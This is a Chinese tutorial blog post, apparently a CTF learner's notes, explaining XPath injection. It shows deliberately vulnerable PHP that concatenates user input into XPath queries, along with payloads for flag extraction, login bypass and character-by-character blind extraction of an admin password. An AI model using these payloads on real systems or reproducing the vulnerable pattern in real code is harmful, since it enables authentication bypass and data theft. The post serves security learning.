本文最后更新于:2023年8月25日 下午
[TOC]
xpath注入漏洞
前言
今天碰到一个ctf题目,是有关xpath盲注的,之前从没了解过,所以学习了一下,写博客记录下来
什么是xpath
XPath即为XML路径语言,它是一种用来确定XML文档中某部分位置的语言。XPath基于XML的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力
xpath注入类似于sql注入,是由于解释器的容错特性导致,当网站使用未经正确处理的用户输入查询 XML 数据时,可能发生 XPATH 注入
xpath语法
在学习xpath注入之前肯定要先了解其语法:
具体参照 菜鸟教程
假设xml文档如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book>
<title lang="eng">Harry Potter</title>
<price>29.99</price>
</book>
<book>
<title lang="eng">Learning XML</title>
<price>39.95</price>
</book>
</bookstore>
|
| 路径表达式 |
结果 |
| bookstore |
选取 bookstore 元素的所有子节点。 |
| /bookstore |
选取根元素 bookstore。注释:假如路径起始于正斜杠( / ),则此路径始终代表到某元素的绝对路径! |
| bookstore/book |
选取属于 bookstore 的子元素的所有 book 元素。 |
| //book |
选取所有 book 子元素,而不管它们在文档中的位置。 |
| bookstore//book |
选择属于 bookstore 元素的后代的所有 book 元素,而不管它们位于 bookstore 之下的什么位置。 |
| //@lang |
选取名为 lang 的所有属性。 |
| /bookstore/book[1] |
选取属于 bookstore 子元素的第一个 book 元素。 |
| /bookstore/book[last()] |
选取属于 bookstore 子元素的最后一个 book 元素。 |
| /bookstore/book[last()-1] |
选取属于 bookstore 子元素的倒数第二个 book 元素。 |
| /bookstore/book[position()<3] |
选取最前面的两个属于 bookstore 元素的子元素的 book 元素。 |
| //title[@lang] |
选取所有拥有名为 lang 的属性的 title 元素。 |
| //title[@lang=’eng’] |
选取所有 title 元素,且这些元素拥有值为 eng 的 lang 属性。 |
| /bookstore/book[price>35.00] |
选取 bookstore 元素的所有 book 元素,且其中的 price 元素的值须大于 35.00。 |
| /bookstore/book[price>35.00]//title |
选取 bookstore 元素中的 book 元素的所有 title 元素,且其中的 price 元素的值须大于 35.00。 |
| 路径表达式 |
结果 |
| //book/title | //book/price |
选取 book 元素的所有 title 和 price 元素。 |
| //title | //price |
选取文档中的所有 title 和 price 元素。 |
| /bookstore/book/title | //price |
选取属于 bookstore 元素的 book 元素的所有 title 元素,以及文档中所有的 price 元素。 |
| 路径表达式 |
结果 |
| /bookstore/* |
选取 bookstore 元素的所有子元素。 |
| //* |
选取文档中的所有元素。 |
| //title[@*] |
选取所有带有属性的 title 元素。 |
简单了解一下就行了
常规xpath注入
test.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| <?xml version="1.0" encoding="utf-8"?>
<root1>
<user>
<username name='user1'>user1</username>
<key>KEY:1</key>
<username name='user2'>user2</username>
<key>KEY:2</key>
<username name='user3'>user3</username>
<key>KEY:3</key>
<username name='user4'>user4</username>
<key>KEY:4</key>
<username name='user5'>user5</username>
<key>KEY:5</key>
<username name='user6'>user6</username>
<key>KEY:6</key>
<username name='user7'>user7</username>
<key>KEY:7</key>
<username name='user8'>user8</username>
<key>KEY:8</key>
<username name='user9'>user9</username>
<key>KEY:9</key>
</user>
<hctfadmin>
<username name='hctf1'>hctf</username>
<key>flag:hctf{Dd0g_fac3_t0_k3yboard233}</key>
</hctfadmin>
</root1>
|
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
if (file_exists('test.xml')) {
$xml = simplexml_load_file('test.xml');
$user = $_GET['user'];
$query = "user/username[@name='" . $user . "']";
$ans = $xml->xpath($query);
foreach ($ans as $x => $x_value) {
echo "2";
echo $x . ": " . $x_value;
echo "<br />";
}
}
?>
|
这个文件的逻辑是判断test.xml是否存在,如果存在,则加载test.xml给$xml变量,然后xpath查询user/username其中属性@name的值等于$user的,将其查询出来
很明显这里没有对输入做出任何过滤,我们可以闭合引号,然后构造恶意xpath语句查询出flag
首先我们先正常输入一下:

然后我们输入一个单引号:

报错了,接着我们构造:
原查询语句即为:
1
| user/username[@name='' or '1'='1']
|
条件为true,会将 /user/username中的值全部查询出来

但是这里没有查询出flag,why?因为flag不在这个路径下,我们怎么构造呢?
1
| '] | hctfadmin/*[position()=2] | //*['
|
原查询语句就是:
1
| user/username[@name=''] | hctfadmin/*[position()=2] | //*['']
|

xpath绕过登录
test.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?xml version="1.0" encoding="UTF-8"?>
<accounts>
<user id="1">
<username>leekos</username>
<email>admin@xx.com</email>
<accounttype>administrator</accounttype>
<password>P@ssword123</password>
</user>
<user id="2">
<username>test</username>
<email>tw@xx.com</email>
<accounttype>normal</accounttype>
<password>123456</password>
</user>
</accounts>
|
login.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body>
<form method="POST">
username:
<input type="text" name="username">
</p>
password:
<input type="password" name="password">
</p>
<input type="submit" value="登录" name="submit">
</p>
</form>
</body>
</html>
<?php
if (file_exists('test.xml')) {
$xml = simplexml_load_file('test.xml');
if ($_POST['submit']) {
$username = $_POST['username'];
$password = $_POST['password'];
$x_query = "/accounts/user[username='{$username}' and password='{$password}']";
$result = $xml->xpath($x_query);
if (count($result) == 0) {
echo '登录失败';
} else {
echo "登录成功";
$login_user = $result[0]->username;
echo "you login as $login_user";
}
}
}
?>
|
这里我们只知道test账号和密码,如何才能以管理员权限登录呢?
这里我们假设不知道管理员的账号leekos
这里同样存在xpath注入:
1
| /accounts/user[username='{$username}' and password='{$password}']
|
这里我们其实只要知道了一个用户的名称就可以无需密码登录了:

但是这里我们不知道管理员的账号的密码,怎么登录呢?
由于很多管理账号默认在数据库的第一位,所以我们使用类似sql万能密码就可以以管理员身份注入了:

xpath盲注
重头戏
xpath盲注适用于不知道xml文档的结构,并且没有报错相关信息,只能通过布尔查询的情况
xpath盲注查询步骤
- 查询根目录下结点数
- 查询根目录下某一结点的长度
- 查询根目录下某一结点的名称
- …….
test.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?xml version="1.0" encoding="UTF-8"?>
<accounts>
<user id="1">
<username>leekos</username>
<email>admin@xx.com</email>
<accounttype>administrator</accounttype>
<password>P@ssword123</password>
</user>
<user id="2">
<username>test</username>
<email>tw@xx.com</email>
<accounttype>normal</accounttype>
<password>123456</password>
</user>
</accounts>
|
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
if (file_exists('test.xml')) {
$xml = simplexml_load_file('test.xml');
$user = $_GET['user'];
$query = "user/username[@name='" . $user . "']";
$ans = $xml->xpath($query);
foreach ($ans as $x => $x_value) {
echo "2";
echo $x . ": " . $x_value;
echo "<br />";
}
}
?>
|
假设我们需要查询管理员账户的密码:
我们先测试一下根目录下有几个结点:count()是计数的函数
刚好测出只有根目录一个结点
然后测出长度为:8 string-length()是计算字符串长度的函数
1
| ' or string-length(name(/*[1]))=8 or '
|
然后开始盲注,一个个猜该结点的字符:
1
2
3
| ' or substring((name(/*[1])),1,1)='a' or '
' or substring((name(/*[1])),2,1)='c' or '
...
|
注入出结点名称:accounts
测试/accounts下有几个结点:(测出两个)
1
| ' or count(/accounts/*)=2 or '
|
第一个子节点的长度为4:
1
| ' or string-length(name(/accounts/*[1]))=4 or '
|
该节点共有四个子节点:
1
| ' or count(/accounts/*[1]/*)=4 or '
|
此处不再赘述,假设已经获得子节点password
现在我们需要获取它的长度:
1
| ' or string-length(/accounts/*[1]/password)=11 or '
|
盲注测出具体值:
1
2
3
| ' or substring((/accounts/*[1]/password),1,1)='P' or '
' or substring((/accounts/*[1]/password),2,1)='@' or '
...
|
总结
easy,不难,熟练一下就好了,重要的要写盲注脚本





